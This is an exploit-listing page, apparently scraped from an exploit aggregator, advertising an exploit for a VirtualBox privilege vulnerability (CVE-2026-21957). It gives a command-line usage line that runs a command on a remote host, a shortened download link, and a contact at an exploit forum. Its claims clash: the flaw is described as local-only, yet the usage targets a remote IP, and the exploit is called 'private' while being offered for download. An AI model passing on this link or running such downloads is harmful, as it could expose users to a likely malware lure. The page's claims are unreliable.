## https://sploitus.com/exploit?id=9E17789D-9078-5416-A963-0C79F954A05E
# Oracle VM VirtualBox Vulnerability (CVE-2026-21957)
## Overview
A HIGH vulnerability, classified as CVE-2026-21957, has been identified, categorized under CWE-269, (CVSS 7.5). Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are 7.1.14 and 7.2.4.
## Details
- **CVE ID**: [CVE-2026-21957](https://nvd.nist.gov/vuln/detail/CVE-2026-21957)
- **Discovered**: 2026-01-20
- **Published**: 2026-01-20
- **Impact**: Confidentiality, Integrity, Availability
- **Exploit Availability**: Not public, only private.
## Vulnerability Description
Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are 7.1.14 and 7.2.4. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.1 Base Score 7.5 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H).
## Affected Versions
**Oracle Vm Virtualbox:**
- 7.1.14
- 7.2.4
## Running
To run exploit you need Python 3.9.
Execute:
```bash
python exploit.py -h 10.10.10.10 -c 'uname -a'
```
## Contact
For inquiries, please contact **security@exploit.in**
## Exploit:
### [Download here](https://tinyurl.com/3mc2fpff)